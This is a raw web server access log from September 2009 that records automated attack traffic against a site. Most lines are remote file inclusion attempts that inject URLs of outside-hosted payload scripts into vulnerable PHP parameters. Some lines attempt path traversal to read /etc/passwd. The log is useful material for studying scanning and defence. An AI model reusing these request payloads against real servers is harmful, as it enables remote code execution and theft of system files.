124.158.127.241 - - [12/Sep/2009:00:44:46 -0400] "GET /logs/error_log.Q109060900%20%20//?sourcedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.158.127.241 - - [12/Sep/2009:00:45:07 -0400] "GET /logs/error_log.Q109081000%20%20//?sourcedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:45:38 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:45:41 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:45:41 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:46:16 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:46:16 -0400] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:46:16 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:46:55 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:46:55 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:47:11 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:47:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:47:11 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:47:15 -0400] "GET /logs/access_log.Q109052800///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:47:31 -0400] "GET /logs/error_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:48:01 -0400] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:48:02 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:48:04 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:48:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.222.1.40 - - [12/Sep/2009:00:48:44 -0400] "GET /index.php?redir=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:00:48:44 -0400] "GET /logs/access_log.Q109071900%20%20/index.php?redir=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:00:48:44 -0400] "GET /logs/index.php?redir=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:00:48:53 -0400] "GET /logs/error_log.Q109071900%20%20/index.php?redir=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:05 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:05 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:05 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:07 -0400] "GET /logs/access_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:07 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:07 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:14 -0400] "GET /logs/error_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:49:17 -0400] "GET /logs/error_log.Q109071900%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:00:49:43 -0400] "GET //?sourcedir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:00:49:44 -0400] "GET /logs/access_log.Q109080700%20%20//?sourcedir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:00:49:43 -0400] "GET /logs//?sourcedir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:00:52:45 -0400] "GET //?sourcedir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:00:52:45 -0400] "GET /logs//?sourcedir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:00:52:46 -0400] "GET /logs/access_log.Q109080700%20%20//?sourcedir=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:53:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.251.105.194 - - [12/Sep/2009:00:57:21 -0400] "GET /logs/access_log.Q109051200//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.157.45.177 - - [12/Sep/2009:00:58:04 -0400] "GET /logs/error_log.Q109062300%20//library/lib.php?root=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "-"
88.157.45.177 - - [12/Sep/2009:00:58:05 -0400] "GET /logs//library/lib.php?root=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 219 "-" "-"
88.157.45.177 - - [12/Sep/2009:00:58:05 -0400] "GET /logs//library/lib.php?root=./../../../../../../../../etc/passwd HTTP/1.1" 404 219 "-" "-"
88.157.45.177 - - [12/Sep/2009:00:58:05 -0400] "GET /logs/error_log.Q109062300%20//library/lib.php?root=./../../../../../../../../etc/passwd HTTP/1.1" 404 241 "-" "-"
88.157.45.177 - - [12/Sep/2009:00:58:06 -0400] "GET //library/lib.php?root=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "-"
88.157.45.177 - - [12/Sep/2009:00:58:06 -0400] "GET //library/lib.php?root=./../../../../../../../../etc/passwd HTTP/1.1" 404 214 "-" "-"
209.59.12.99 - - [12/Sep/2009:00:58:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:00:58:32 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:58:32 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:58:32 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:58:49 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:58:49 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:58:49 -0400] "GET /logs/error_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.221.195.250 - - [12/Sep/2009:00:59:04 -0400] "GET /logs/error_log.Q109052800///?_SERVER[DOCUMENT_ROOT]=http://pyungan.or.kr/bbs/user/idkambe.txt??? HTTP/1.0" 404 226 "-" "libwww-perl/5.53"
66.221.195.250 - - [12/Sep/2009:00:59:04 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://pyungan.or.kr/bbs/user/idkambe.txt??? HTTP/1.0" 200 453 "-" "libwww-perl/5.53"
66.221.195.250 - - [12/Sep/2009:00:59:05 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://pyungan.or.kr/bbs/user/idkambe.txt??? HTTP/1.0" 200 17504 "-" "libwww-perl/5.53"
174.34.163.101 - - [12/Sep/2009:00:59:18 -0400] "GET /logs/access_log.Q109081200%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:59:22 -0400] "GET /logs/access_log.Q109081700//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:00:59:40 -0400] "GET /logs/access_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:00:00 -0400] "GET /logs/access_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
76.98.14.234 - - [12/Sep/2009:00:59:52 -0400] "GET http://www.aceonlinestore.com/logs/access_log.Q109071900 HTTP/1.1" 200 2331784 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.215.235.2 - - [12/Sep/2009:01:00:12 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:18 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:18 -0400] "GET /logs/error_log.Q109060300%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:18 -0400] "GET /logs/access_log.Q109070300%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:18 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:25 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:25 -0400] "GET /logs/error_log.Q109060300%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:00:25 -0400] "GET /logs/access_log.Q109070300%20%20//include/mail.inc.php?skin_board_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:00:27 -0400] "GET /logs/error_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:00:36 -0400] "GET /logs/error_log.Q109070600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:00:36 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.221.195.250 - - [12/Sep/2009:01:00:40 -0400] "GET /logs/access_log.Q109052800///?_SERVER[DOCUMENT_ROOT]=http://pyungan.or.kr/bbs/user/idkambe.txt??? HTTP/1.0" 404 227 "-" "libwww-perl/5.53"
220.73.161.101 - - [12/Sep/2009:01:01:05 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:01:20 -0400] "GET /logs/access_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:01:53 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:01:53 -0400] "GET /logs/access_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:03:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.158.127.241 - - [12/Sep/2009:01:03:51 -0400] "GET /logs/error_log.Q109081000//?sourcedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.130.31 - - [12/Sep/2009:01:04:20 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://aboutav.com//gmn/test.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
77.221.130.31 - - [12/Sep/2009:01:04:20 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://aboutav.com//gmn/test.txt? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
174.34.163.101 - - [12/Sep/2009:01:04:48 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:04:48 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:04:48 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:05:11 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:05:11 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:05:11 -0400] "GET /logs/error_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:05:30 -0400] "GET /logs/access_log.Q109081200%20%20//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:05:57 -0400] "GET /logs/access_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:06:14 -0400] "GET /logs/access_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:06:31 -0400] "GET /logs/error_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:06:37 -0400] "GET /logs/error_log.Q109070600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:06:37 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:06:56 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:07:07 -0400] "GET /logs/access_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.31 - - [12/Sep/2009:01:07:10 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://aboutav.com//gmn/test.txt? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
77.221.130.31 - - [12/Sep/2009:01:07:10 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://aboutav.com//gmn/test.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
220.73.161.101 - - [12/Sep/2009:01:07:16 -0400] "GET /logs/error_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:07:16 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:07:16 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:07:34 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:07:34 -0400] "GET /logs/access_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:07:55 -0400] "GET /logs/access_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:08:13 -0400] "GET /logs/access_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:08:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.73.161.101 - - [12/Sep/2009:01:08:45 -0400] "GET /logs/error_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:08:56 -0400] "GET /logs/error_log.Q109070600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:08:56 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:09:24 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:30 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:30 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:30 -0400] "GET /logs/access_log.Q109070300%20%20//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:30 -0400] "GET /logs/error_log.Q109060300%20%20//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:09:33 -0400] "GET /logs/access_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:50 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:50 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:50 -0400] "GET /logs/error_log.Q109060300%20%20//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:09:50 -0400] "GET /logs/access_log.Q109070300%20%20//include/bbs.lib.inc.php?site_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:09:59 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:09:59 -0400] "GET /logs/access_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.38.136.251 - - [12/Sep/2009:01:10:42 -0400] "GET //include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.38.136.251 - - [12/Sep/2009:01:10:46 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.136.251 - - [12/Sep/2009:01:10:46 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:01:10:53 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:01:10:53 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:01:10:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:01:11:40 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:01:11:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:01:11:43 -0400] "GET //include/mail.inc.php?skin_board_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:12:14 -0400] "GET /logs//skin/ggambo6200_boardgallery/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:12:14 -0400] "GET /logs/access_log.Q109061000%20%20//skin/ggambo6200_boardgallery/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
